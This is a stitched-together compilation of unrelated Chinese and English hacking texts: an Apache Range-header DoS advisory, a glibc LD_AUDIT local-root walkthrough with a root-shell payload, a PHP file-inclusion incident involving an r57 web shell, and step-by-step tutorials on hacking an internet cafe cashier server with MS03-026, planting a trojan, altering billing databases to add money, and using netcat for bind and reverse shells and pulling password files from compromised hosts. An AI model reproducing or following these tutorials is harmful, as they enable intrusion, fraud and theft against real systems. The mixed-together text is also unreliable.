Apache 项目日前发布了一个拒绝服务(DoS)漏洞警告,该漏洞可让攻击者轻松的让 Apache 软件拒绝服务,该漏洞影响 Apache 的所有版本。而且这样的攻击工具已经公开,该攻击可使 Apache Http Server 占用大多数的内存和 CPU,从而导致无法处理正常的请求。
采用默认方式安装的 Apache 非常容易受此攻击,而且目前还没有相应的补丁版本。

攻击工具: http://seclists.org/fulldisclosure/2011/Aug/175

经过我在apahce 2.2x上的测试,下面的办法是可行的。

下文转自:http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110824161640.122D387DD@minotaur.apache.org%3E

Description:
============

A denial of service vulnerability has been found in the way the multiple
overlapping ranges are handled by the Apache HTTPD server:

     http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has
been observed.

The attack can be done remotely and with a modest number of requests can
cause very significant memory and CPU usage on the server.

The default Apache HTTPD installation is vulnerable.

There is currently no patch/new version of Apache HTTPD which fixes this
vulnerability. This advisory will be updated when a long term fix
is available.

A full fix is expected in the next 48 hours.

Mitigation:
============

However there are several immediate options to mitigate this issue until
a full fix is available:

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
   either ignore the Range: header or reject the request.

   Option 1: (Apache 2.0 and 2.2)

          # Drop the Range header when more than 5 ranges.
          # CVE-2011-3192
          SetEnvIf Range (,.*?){5,} bad-range=1
          RequestHeader unset Range env=bad-range

          # optional logging.
          CustomLog logs/range-CVE-2011-3192.log common env=bad-range

   Option 2: (Also for Apache 1.3)

          # Reject request when more than 5 ranges in the Range: header.
          # CVE-2011-3192
          #
          RewriteEngine on
          RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
          RewriteRule .* – [F]

   The number 5 is arbitrary. Several 10’s should not be an issue and may be
   required for sites which for example serve PDFs to very high end eReaders
   or use things such complex http based video streaming.

2) Limit the size of the request field to a few hundred bytes. Note that while
   this keeps the offending Range header short – it may break other headers;
   such as sizeable cookies or security fields.

          LimitRequestFieldSize 200

   Note that as the attack evolves in the field you are likely to have
   to further limit this and/or impose other LimitRequestFields limits.

   See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize

3) Use mod_headers to completely dis-allow the use of Range headers:

          RequestHeader unset Range

   Note that this may break certain clients – such as those used for
   e-Readers and progressive/http-streaming video.

4) Deploy a Range header count module as a temporary stopgap measure:

     http://people.apache.org/~dirkx/mod_rangecnt.c

   Precompiled binaries for some platforms are available at:

    http://people.apache.org/~dirkx/BINARIES.txt

5) Apply any of the current patches under discussion – such as:

   http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g@mail.gmail.com%3e

Actions:
========

Apache HTTPD users who are concerned about a DoS attack against their server
should consider implementing any of the above mitigations immediately.

When using a third party attack tool to verify vulnerability – know that most
of the versions in the wild currently check for the presence of mod_deflate;
and will (mis)report that your server is not vulnerable if this module is not
present. This vulnerability is not dependent on presence or absence of
that module.

Planning:
=========

This advisory will be updated when new information, a patch or a new release
is available. A patch or new apache release for Apache 2.0 and 2.2 is expected
in the next 48 hours. Note that, while popular, Apache 1.3 is deprecated.

http://marc.info/?l=full-disclosure&m=128739684614072&w=2

Perhaps surprisingly, this error is exploitable.

——————–
Affected Software
————————

At least the following versions have been tested

2.12.1, FC13
2.5, RHEL5 / CentOS5

Other versions are probably affected, possibly via different vectors. I’m aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it’s possible to avoid this.

——————–
Consequences
———————–

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x—— 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x—— 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target
(deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to
dlopen(). $ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx— 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

——————-
Mitigation
———————–

It is a good idea to prevent users from creating files on filesystems mounted
without nosuid. The following interesting solution for administrators who
cannot modify their partitioning scheme was suggested to me by Rob Holland
(@robholland):

You can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,
for example:

# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp

Be aware of race conditions at boot via crond/atd/etc, and users with
references to existing directories (man lsof), but this may be an acceptable
workaround until a patch is ready for deployment.

(Of course you need to do this everywhere untrusted users can make links to
suid/sgid binaries. find(1) is your friend).

If someone wants to create an init script that would automate this at boot for
their distribution, I’m sure it would be appreciated by other administrators.

——————-
Solution
———————–

Major distributions should be releasing updated glibc packages shortly.

网站是四年前刚学PHP的时候帮朋友弄的,有些参数没有处理好,造成让人挂马。

php内有一段是这样的,目的是动态加载一个静态页

$type.=".htm";
include ($type);

$type是通过url传过来的值,如:
showhtml.php?type=index

因为虚拟主机的是激活的,所以黑客用了这个地址:
/showhtml.php?type=http://evilc0der.com/r57.txt??

而r57.txt其实是一个PHP文件,是一个黑客工具,叫r57shell(http://www.xfocus.net/tools/200508/1075.html)

打开上面的地址显示为:

然后通过upload file就可以替换首页了。

那个家伙还搞了一堆网址,估计都是有漏洞的。在这个页面内:http://www.evilc0der.com/serverlar.html

解决办法到是简单,增加对$type的判断就是了。

交大家怎么进行入侵网吧收银服务器把(黑鹰)
大家先准备的工具:
                 1.X-Scan-v3.3
  下载地址为:http://dx.3800hk.com/Soft/smgj/7824.html
   3.Metasploit Framework(集合所有漏洞的溢出程序)
      下载地址为:http://dx.3800hk.com/Soft/smgj/13086.html

 
现在网吧向弱口令这样的漏洞很少见了 我们就来完溢出…溢出使用的工具为Metasploit Framework 功能很强大的  包括了最近很流行的ms06-040的漏洞利用程序,有时间大家多研究下 .
  这个是软件安装的位置 
我们第一次安装好还要进行更新下,msfupdate这个是更新程序,由于我开始使用的时候都已经更新好了,所以就没提示更新的文件,大家刚安装好更新他会提示你有多少个更新文件的  大家选yes它就自动更新了..
速度慢的话请大家快进看 ,高手就过把…

首先大家查出收银服务器的ip地址,这个就不用我查了把大家都会把 ,安装好各种软件

 先用x-scan进行扫描漏洞
 本网吧收银的ip 是168.168.168.118,现在在扫描漏洞比较慢,由于时间问题我已经提前扫好

好了现在x-scan扫描完成了  我们看下它的报告

我们先来看下他的445端口能不能溢出,现在很流行的  ..

 

先打开msfweb
我们就利用这个漏洞来溢出把 现在用到的是Metasploit Framework

我们先打开这个程序..然后在浏览器里输入http://127.0.0.1:55555

找到漏洞的利用程序..Microsoft CanonicalizePathName() MSO6-040 Overflow
我们先来这个..大家看我操作..

如果出现这个情况的话证明没有此漏洞了 ,已经被封了  现在我们在来看下其他的漏洞信息..

ok 又有个漏洞了

Microsoft RRPC接口缓冲区溢出漏洞(823980)

远程Windows主机的RPC接口存在缓冲区溢出漏洞。
该漏洞可导致远程攻击者以SYSTEM权限在系统中执行任意代码。

远程攻击者或蠕虫能据此获得主机的控制权。

该漏洞已经引发了至少一个蠕虫:MSBlast。

解决方案:参考 http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

风险等级 : 严重
___________________________________________________________________

The remote host is running a version of Windows which has a flaw in
its RPC interface which may allow an attacker to execute arbitrary code
and gain SYSTEM privileges. There is at least one Worm which is
currently exploiting this vulnerability. Namely, the MsBlaster worm.

Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor : High
CVE_ID : CAN-2003-0352
BUGTRAQ_ID : 8205
NESSUS_ID : 11808
Other references : IAVA:2003-A-0011

 

MS03-026我们就用这个来溢出..首先我们来找到它的溢出程序.

大家看我操作

Microsoft RPC DCOM MSO3-026
这个就是了  //

The target address  被溢出的ip 地址168.168.168.118

然后点exploit
[*] Starting Reverse Handler.
[*] Sending request…
[*] Got connection from 168.168.168.93:4321 <-> 168.168.168.118:1341
[*] Shell started on session 4

返回这个结果证明溢出成功我门在来点session4  如果出现的是此页无法显示证明溢出失败..
Microsoft Windows 2000 [Version 5.00.2195]
(C) °?è¨?ùóD 1985-1998 Microsoft Corp.

C:WINNTsystem32>

这个截面大家不会陌生把  呵呵 ..我们先来验证下/
C:WINNTsystem32>
>> ipconfig

ipconfig

Windows 2000 IP Configuration

 

Ethernet adapter ±?μ?á??ó:

 

 Connection-specific DNS Suffix  . :
 IP Address. . . . . . . . . . . . : 168.168.168.118

 Subnet Mask . . . . . . . . . . . : 255.255.255.128

 Default Gateway . . . . . . . . . : 168.168.168.126

C:WINNTsystem32>

现在就是 可以直接创建用户然后提权了…
命令是net user 用户名 密码 /add
提权命令是net localgroup administrators 用户名 /add
然后我们可以在开它的telnet

由于是国外软件可能不是很好支持中文把..

打开telnet后就可以直接用ftp培植木马了  灰鸽子 呵呵…

ok了 现在就来 用灰鸽子了..

昏  出了问题 思路还有很多 呵呵   我们不用ftp一样可以

开他共享 呵呵  我已经开好了这么多了

开共享命令为net share 共享名=目标路径 如net share d$=d:
这样我们就可以直接登陆他的共享盘  然后放木马进去用telnet 运行.

灰鸽子的使用我就不用交了把 呵呵 

我开始使用的时候都中过了现在就让大家看下把 ,..

昏   收银的睡着了…早就看到抱错了的..

到了这就不用我在说什么了把,希望大家不要利用此种方法进行恶意破坏行为..
也希望各网管打好各种补丁.

 

 

 

 

 

需要用的工具:

数据库管理助手
Recton–D贺免杀专用版
NTscan

不罗嗦我们开始
首先用NTscan看我操作
192.168.0.100 就是她了 网吧主机的IP  一般网吧主机都是空口令
用Recton–D贺免杀专用版开她的telnet
Telnet服务已经成功打开!端口:23 . 表示已经打开了
然后打开CMD连接 telnet 192.168.0.100 等下

进去了
 
继续
要想加钱首先的知道他的万象的数据库位置
我们用dir查看他的目录 因为经过我的实验我发现主机上装有还原卡还原C盘所以我确定网管软件应该在别的盘
因为我事先已经找到数据库的位置我就不罗嗦了 怕有的朋友看不懂我还是进去看一下好了Oct2003.mdb这个就是网吧数据库
继续
下一步
把她的万象所在盘做共享我门网吧的安装路径是D盘把他的D做共享
命令格式:net share d=d:
提示成功
我们用数据库管理助手打开万象数据库看我操作 Info TEKSicentOct2003.mdb

添上万象的默认密码chrdwhdhxt
然后找到最后表
用数据库管理助手的搜索功能选第一个填上你的会员卡号 因为我刚刚冲完我就不冲我自己的了给别人冲下把哈哈
这里写你的会员卡号 点搜索 继续看我操作 这个2.2 就是他的钱 用的竟然这么快 我给他改一下
这里写上你想要改的金额 改好以后 打工具蓝哪个对号
然后打上对号
加钱成功了这回你还怕什么
 对了改完以后记得把他的D的共享关了以免你以后没玩的
 好了冲钱到此结束

0. 写在前面的话
1. Netcat 1.10 for NT – nc11nt.zip,原始英文信息
2. Netcat 1.10 for NT 帮助信息
3. Netcat 1.10 常用的命令格式
4. 管理肉鸡,更改肉鸡设置
5. 下载连接
6. 后记

######################################################################
0. 写在前面的话
######################################################################
最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。
自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,
但是借助于金山词霸2002版本, 还是明白了一点东西.
我觉的有必要再总结一下.反正主要是满足我自己的需要.

######################################################################
1. Netcat 1.10 for NT – nc11nt.zip
######################################################################
Basic Features

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
connections
* Telnet-options responder

New for NT

* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
connection
________________________________________________________________________
Some of the features of netcat are: 

Outbound or inbound connections, TCP or UDP, to or from any ports 
Full DNS forward/reverse checking, with appropriate warnings 
Ability to use any local source port 
Ability to use any locally-configured network source address 
Built-in port-scanning capabilities, with randomizer 
Built-in loose source-routing capability 
Can read command line arguments from standard input 
Slow-send mode, one line every N seconds 
Optional ability to let another program service inbound connections 

Some of the potential uses of netcat: 

Script backends 
Scanning ports and inventorying services 
Backup handlers 
File transfers 
Server testing and simulation 
Firewall testing 
Proxy gatewaying 
Network performance testing 
Address spoofing tests 
Protecting X servers 
1001 other uses you`ll likely come up with 

Netcat + Encryption = Cryptcat

对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1 NC.EXE是一个非标准的telnet客户端程序,
1.2 还有一个putty.exe客户端程序,提供四种连接模式
-raw -telnet -rlogin -ssh.

######################################################################
2. Netcat 1.10 for NT 帮助信息
######################################################################
C:WINDOWSDesktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后台模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft (本帮助信息)
-i secs delay interval for lines sent, ports scanned (延迟时间)
-l listen mode, for inbound connects (监听模式,等待连接)
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)
-o file hex dump of traffic (十六进制模式输出文件,三段) 
-p port local port number (本地端口)
-r randomize local and remote ports (随机本地远程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (扫描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]

######################################################################
3. Netcat 1.10 常用的命令格式
######################################################################
下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。

3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
3.2.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心

3.3. 后门
victim machine: //受害者的机器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器.
nc ip -p port //连接victim_IP,然后得到一个shell。

3.4.反向连接
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc -vv -l -p port 
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port

或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。 

3.5.传送文件:
3.5.1 attacker machine <– victim machine //从肉鸡拖密码文件回来.
nc -d -l -p port < pathfiledest     /*attacker machine*/ 可以shell执行
nc -vv attacker_ip port > pathfile.txt /*victim machine*/ 需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

3.5.2 attacker machine –> victim machine //上传命令文件到肉鸡
nc -vv -l -p port > pathfile.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < pathfiledest   /*attacker machine*/ 可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论: 可以传输ascii,bin文件.可以传输程序文件.

问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .
或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?

3.6 端口数据抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized…
< 00000084 83 00 00 01 8f # …..

3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个.
nc victim_ip port < pathfile.cmd   /*victim machine*/ 显示执行过程.
nc -vv victim_ip port < pathfile.cmd   /*victim machine*/ 显示执行过程.

nc -d victim_ip port < pathfile.cmd 安静模式.

_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd 
md test
cd /d %windir%system32
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________

######################################################################
4. 管理肉鸡,更改肉鸡设置
######################################################################
4.1 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver"
使用winshell后门. 端口1234 密码password
命令格式就是
modi.bat youip.txt

___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END

:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%system32 >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd

:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

:END
___________modi.bat__END_______________________

4.2

@echo off
color f0
:start
cls
C:nc -vv -w 3 -l -p 80>>80.txt
goto start
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组–妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.
但是也是一种便宜的办法.

肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞

自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器

######################################################################
5. 下载连接
######################################################################
5.1 http://www.atstake.com/research/tools/network_utilities/
Tool: Netcat 1.10 for Unix 
Version: 03.20.96 
Platforms: *nix

Tool: Netcat 1.1 for Win 95/98/NT/2000 
Version: 02.08.98 
Platforms: Runs on Win 95/98/NT/2000 

5.2 http://www.xfocus.net/download.php?id=320 
名称: cryptcat_nt.zip 更新时间: 2002-04-05 
类别: 网络工具 平台: Win9x/NT/2000 大小: 115.8K 提交: maxilaw 
简介: 加密传输的nc。 

5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ 国外的网站
10.03.02 15:48 1305 cryptcat.txt
10.03.02 15:48 245760 cryptcat_linux2.tar
10.03.02 15:48 118533 cryptcat_nt.zip

######################################################################
6. 后记
######################################################################

只有明天上网,找个win2000 server登陆终端服务来测试了。
我的还是破win98,没有办法哟.

多试试,多想想,可能你可以用它来做更多事情——你可以参见nc110.tgz里script目录下的那
些脚本,从中获得一些思路。 
我这儿没有nc110.tgz压缩包。明天去google.com搜索一下。
Unix 下面的命令还是不熟悉.